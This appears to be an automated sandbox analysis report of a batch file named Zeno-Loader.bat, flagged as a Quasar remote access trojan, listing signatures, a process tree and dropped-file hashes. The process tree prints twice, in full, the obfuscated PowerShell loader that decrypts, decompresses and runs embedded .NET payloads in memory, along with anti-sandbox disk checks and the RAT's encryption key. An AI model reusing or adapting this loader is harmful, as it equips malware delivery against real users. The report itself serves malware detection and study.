Analysis
-
max time kernel
79s -
max time network
74s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
-
submitted
05-01-2025 21:33
General
-
Target
Zeno-Loader.bat
-
Size
7.2MB
-
MD5
72d00f0024897e8f1df20016101ab45a
-
SHA1
af3ed84e2ed1de471e4773fb6d06aa0fc1ee0f6c
-
SHA256
67dfd63675918029facddae2fffc7573597922fbaa18c39d59a22b226d37f881
-
SHA512
6fe39ed252674f0ff775786aeab76d2decfa289f88cea0422f58d29a5d8a4890906ddef72038b1f652a108c3d3c40ac9dedcf2b4696ba89b10063f41409ba13c
-
SSDEEP
49152:gMILTqFg07h0GJm30wMjiN7lAMOLSp3q2iK2JxEaaqNaUhAFCuMtZiXC8s2FDFkg:G
Score
10/10
Malware Config
Extracted
Family
quasar
Attributes
-
encryption_key
BF83117B79367DC6A2463E499652930B1A20BE7A
-
reconnect_delay
3000
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 1 IoCs
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 4 IoCs
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies data under HKEY_USERS 48 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{0095de05-b984-4ed1-a75d-bc98cbd715db}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5467bb55-10c0-43ba-965f-166e9e06e9c4}2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Zeno-Loader.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"3⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function HqOM($FtgQ){ Invoke-Expression -Verbose -InformationAction Ignore '$RrLy=[ZiSZiysZitZiemZi.SZieZicZiuZiriZitZiy.ZiCZirZiyZiptZioZigrZiapZihyZi.ZiAZieZisZi]:Zi:ZiCrZieaZitZie(Zi)Zi;'.Replace('Zi', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore '$RrLy.MWsoWsdeWs=Ws[SWsysWstWseWsmWs.SWseWscuWsrWsiWstWsy.WsCWsryWsptWsogWsrWsaWspWshWsy.WsCWsipWsheWsrWsMoWsdWseWs]Ws:Ws:CWsBWsC;'.Replace('Ws', ''); Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$RrLy.PMWaMWddMWiMWngMW=[MWSMWyMWsMWteMWmMW.SMWeMWcMWuMWriMWtMWy.MWCrMWypMWtMWoMWgMWrMWapMWhMWy.MWPaMWdMWdiMWnMWgMWMMWoMWdeMW]MW::MWPMWKMWCSMW7;'.Replace('MW', ''); Invoke-Expression -Verbose -InformationAction Ignore -Debug -WarningAction Inquire '$RrLy.KBMeBMy=BM[BMSyBMstBMeBMmBM.BMCoBMnBMveBMrBMtBM]BM::BMFBMroBMmBBMasBMeBM6BM4BMSBMtrBMiBMngBM("gBMOBMnZBMEBM4pBMoJBMKBMPBMpBMuuBMnBMORBMXBMnBMaBMXMBMZBMZ2BMv1BMyUBMTBM2BM9BMKBMeYBMfBM1LBMcHBMLBML0BM=BM");'.Replace('BM', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose '$RrLy.IUTVUT=[UTSUTysUTteUTmUT.UTCUTonUTvUTerUTtUT]UT:UT:FUTrUTomUTBaUTseUT6UT4UTSUTtUTriUTnUTg("dUTeUTeUUT1UTklUT1iUTvUTGUTvUTcqUTmUTDrUTrUTBUTFUTswUT=UT=");'.Replace('UT', ''); $UtMm=$RrLy.CreateDecryptor(); $YPFE=$UtMm.TransformFinalBlock($FtgQ, 0, $FtgQ.Length); $UtMm.Dispose(); $RrLy.Dispose(); $YPFE;}function oELX($FtgQ){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose '$xCbM=NGQeGQw-GQOGQbjGQecGQtGQ GQSGQysGQtGQemGQ.GQIGQOGQ.MGQeGQmoGQryGQStGQrGQeGQaGQm(,$FtgQ);'.Replace('GQ', ''); Invoke-Expression -InformationAction Ignore -Verbose -Debug '$sGmg=NGQeGQw-GQOGQbjGQecGQtGQ GQSGQysGQtGQemGQ.GQIGQOGQ.MGQeGQmoGQryGQStGQrGQeGQaGQm;'.Replace('GQ', ''); Invoke-Expression -InformationAction Ignore -Debug '$LXrY=NnWenWw-nWOnWbjnWecnWtnW nWSnWysnWtnWemnW.nWInWOnW.CnWonWmpnWrenWssnWinWonWnnW.nWGZnWinWpSnWtrnWenWamnW($xCbM, [nWInWO.nWCnWomnWprnWenWsnWsnWionWnnW.CnWonWmnWpnWrenWsnWsinWonnWMonWdnWenW]nW:nW:DnWenWconWmpnWrnWesnWsnW);'.Replace('nW', ''); $LXrY.CopyTo($sGmg); $LXrY.Dispose(); $xCbM.Dispose(); $sGmg.Dispose(); $sGmg.ToArray();}function nBzO($FtgQ,$CSYT){ Invoke-Expression -Verbose '$QVxt=[jaSjaysjatjaemja.Rjaejafjaljaecjatjaiojanja.jaAjassjaejambjalyja]:ja:jaLjaojaajad([byte[]]$FtgQ);'.Replace('ja', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore '$ueEA=$QVxt.EXLnXLtrXLyXLPoXLinXLt;'.Replace('XL', ''); Invoke-Expression -Verbose '$ueEA.GOIGOnvGOoGOkeGO($GOnGOuGOlGOl, $CSYT);'.Replace('GO', '');}$fCAG = 'C:\Users\Admin\AppData\Local\Temp\Zeno-Loader.bat';$host.UI.RawUI.WindowTitle = $fCAG;$YQOc=[System.IO.File]::ReadAllText($fCAG).Split([Environment]::NewLine);foreach ($HuHV in $YQOc) { if ($HuHV.StartsWith('WrIqm')) { $Memu=$HuHV.Substring(5); break; }}$Etgk=[string[]]$Memu.Split('\');Invoke-Expression -Verbose -WarningAction Inquire -Debug '$boj = oELX (HqOM ([apCaponapvaperapt]ap:ap:apFaproapmapBaapsapeap6ap4Saptapriapngap($Etgk[0].Replace("#", "/").Replace("@", "A"))));'.Replace('ap', '');Invoke-Expression -Verbose -Debug -InformationAction Ignore -WarningAction Inquire '$CAN = oELX (HqOM ([apCaponapvaperapt]ap:ap:apFaproapmapBaapsapeap6ap4Saptapriapngap($Etgk[1].Replace("#", "/").Replace("@", "A"))));'.Replace('ap', '');Invoke-Expression -Verbose '$nrE = oELX (HqOM ([apCaponapvaperapt]ap:ap:apFaproapmapBaapsapeap6ap4Saptapriapngap($Etgk[2].Replace("#", "/").Replace("@", "A"))));'.Replace('ap', '');nBzO $boj $null;nBzO $CAN $null;nBzO $nrE (,[string[]] (''));3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Zeno-Loader.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat4⤵
- Drops file in Windows directory
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"5⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function HqOM($FtgQ){ Invoke-Expression -Verbose -InformationAction Ignore '$RrLy=[ZiSZiysZitZiemZi.SZieZicZiuZiriZitZiy.ZiCZirZiyZiptZioZigrZiapZihyZi.ZiAZieZisZi]:Zi:ZiCrZieaZitZie(Zi)Zi;'.Replace('Zi', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore '$RrLy.MWsoWsdeWs=Ws[SWsysWstWseWsmWs.SWseWscuWsrWsiWstWsy.WsCWsryWsptWsogWsrWsaWspWshWsy.WsCWsipWsheWsrWsMoWsdWseWs]Ws:Ws:CWsBWsC;'.Replace('Ws', ''); Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$RrLy.PMWaMWddMWiMWngMW=[MWSMWyMWsMWteMWmMW.SMWeMWcMWuMWriMWtMWy.MWCrMWypMWtMWoMWgMWrMWapMWhMWy.MWPaMWdMWdiMWnMWgMWMMWoMWdeMW]MW::MWPMWKMWCSMW7;'.Replace('MW', ''); Invoke-Expression -Verbose -InformationAction Ignore -Debug -WarningAction Inquire '$RrLy.KBMeBMy=BM[BMSyBMstBMeBMmBM.BMCoBMnBMveBMrBMtBM]BM::BMFBMroBMmBBMasBMeBM6BM4BMSBMtrBMiBMngBM("gBMOBMnZBMEBM4pBMoJBMKBMPBMpBMuuBMnBMORBMXBMnBMaBMXMBMZBMZ2BMv1BMyUBMTBM2BM9BMKBMeYBMfBM1LBMcHBMLBML0BM=BM");'.Replace('BM', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose '$RrLy.IUTVUT=[UTSUTysUTteUTmUT.UTCUTonUTvUTerUTtUT]UT:UT:FUTrUTomUTBaUTseUT6UT4UTSUTtUTriUTnUTg("dUTeUTeUUT1UTklUT1iUTvUTGUTvUTcqUTmUTDrUTrUTBUTFUTswUT=UT=");'.Replace('UT', ''); $UtMm=$RrLy.CreateDecryptor(); $YPFE=$UtMm.TransformFinalBlock($FtgQ, 0, $FtgQ.Length); $UtMm.Dispose(); $RrLy.Dispose(); $YPFE;}function oELX($FtgQ){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose '$xCbM=NGQeGQw-GQOGQbjGQecGQtGQ GQSGQysGQtGQemGQ.GQIGQOGQ.MGQeGQmoGQryGQStGQrGQeGQaGQm(,$FtgQ);'.Replace('GQ', ''); Invoke-Expression -InformationAction Ignore -Verbose -Debug '$sGmg=NGQeGQw-GQOGQbjGQecGQtGQ GQSGQysGQtGQemGQ.GQIGQOGQ.MGQeGQmoGQryGQStGQrGQeGQaGQm;'.Replace('GQ', ''); Invoke-Expression -InformationAction Ignore -Debug '$LXrY=NnWenWw-nWOnWbjnWecnWtnW nWSnWysnWtnWemnW.nWInWOnW.CnWonWmpnWrenWssnWinWonWnnW.nWGZnWinWpSnWtrnWenWamnW($xCbM, [nWInWO.nWCnWomnWprnWenWsnWsnWionWnnW.CnWonWmnWpnWrenWsnWsinWonnWMonWdnWenW]nW:nW:DnWenWconWmpnWrnWesnWsnW);'.Replace('nW', ''); $LXrY.CopyTo($sGmg); $LXrY.Dispose(); $xCbM.Dispose(); $sGmg.Dispose(); $sGmg.ToArray();}function nBzO($FtgQ,$CSYT){ Invoke-Expression -Verbose '$QVxt=[jaSjaysjatjaemja.Rjaejafjaljaecjatjaiojanja.jaAjassjaejambjalyja]:ja:jaLjaojaajad([byte[]]$FtgQ);'.Replace('ja', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore '$ueEA=$QVxt.EXLnXLtrXLyXLPoXLinXLt;'.Replace('XL', ''); Invoke-Expression -Verbose '$ueEA.GOIGOnvGOoGOkeGO($GOnGOuGOlGOl, $CSYT);'.Replace('GO', '');}$fCAG = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $fCAG;$YQOc=[System.IO.File]::ReadAllText($fCAG).Split([Environment]::NewLine);foreach ($HuHV in $YQOc) { if ($HuHV.StartsWith('WrIqm')) { $Memu=$HuHV.Substring(5); break; }}$Etgk=[string[]]$Memu.Split('\');Invoke-Expression -Verbose -WarningAction Inquire -Debug '$boj = oELX (HqOM ([apCaponapvaperapt]ap:ap:apFaproapmapBaapsapeap6ap4Saptapriapngap($Etgk[0].Replace("#", "/").Replace("@", "A"))));'.Replace('ap', '');Invoke-Expression -Verbose -Debug -InformationAction Ignore -WarningAction Inquire '$CAN = oELX (HqOM ([apCaponapvaperapt]ap:ap:apFaproapmapBaapsapeap6ap4Saptapriapngap($Etgk[1].Replace("#", "/").Replace("@", "A"))));'.Replace('ap', '');Invoke-Expression -Verbose '$nrE = oELX (HqOM ([apCaponapvaperapt]ap:ap:apFaproapmapBaapsapeap6ap4Saptapriapngap($Etgk[2].Replace("#", "/").Replace("@", "A"))));'.Replace('ap', '');nBzO $boj $null;nBzO $CAN $null;nBzO $nrE (,[string[]] (''));5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F6⤵
-
-
-
-
-
-
C:\Windows\$nya-onimai2\oMQxDG.exe"C:\Windows\$nya-onimai2\oMQxDG.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks processor information in registry
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5da760f8b53fcde92d67d6a610f0a4707
SHA18c75b58f43455329c26520540461832bb90bffeb
SHA2561435d59e62d35d663ae54ca74cebd76a20b00380e3aa189b5d9567cdce7e7528
SHA51290e62d0fe87dfc7810cbf864d6a984f2b4c24add105f18d375221d2e0f7637f7a1c2e34afe92dcbfccb5a435e8dd6c4ca87a9d79a0fff29bd79a0ac21846e3e0
-
Filesize
1KB
MD5aedb4691b4a410acfe415bdf5817c0d9
SHA1acdbec00fdeb48253388f5fa7439e26cbfdebe7d
SHA256cc4e216fe6e882b37196e3a34129e18d386c2541c6527297b84e0350b212cb42
SHA5121712ac283dc4675ed270c62a0599302a2f3974e2668d1a6b04216b0819800b3e7bef124ba497767bd12c9f887ce34239eb4508a4220a6ba6e75393a370a8fc4e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
36KB
MD5b943a57bdf1bbd9c33ab0d33ff885983
SHA11cee65eea1ab27eae9108c081e18a50678bd5cdc
SHA256878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4
SHA512cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c
-
Filesize
7.2MB
MD572d00f0024897e8f1df20016101ab45a
SHA1af3ed84e2ed1de471e4773fb6d06aa0fc1ee0f6c
SHA25667dfd63675918029facddae2fffc7573597922fbaa18c39d59a22b226d37f881
SHA5126fe39ed252674f0ff775786aeab76d2decfa289f88cea0422f58d29a5d8a4890906ddef72038b1f652a108c3d3c40ac9dedcf2b4696ba89b10063f41409ba13c
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
144KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
56KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
2.0MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
280KB
-
Filesize
756KB
-
Filesize
4.3MB
-
Filesize
232KB
-
Filesize
10.8MB
-
Filesize
3.4MB
-
Filesize
8KB
-
Filesize
2.0MB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
756KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
7.4MB
-
Filesize
1.8MB
-
Filesize
72KB
-
Filesize
240KB
-
Filesize
712KB
-
Filesize
320KB